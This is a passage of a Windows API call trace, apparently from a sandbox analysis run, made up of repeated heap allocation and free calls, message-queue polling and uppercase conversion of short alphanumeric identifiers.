(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.040] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.045] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.046] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.046] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.047] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.047] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.047] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.048] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.048] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.048] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.049] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.049] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.051] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.051] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.051] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.052] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.052] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.052] HeapFree (in: 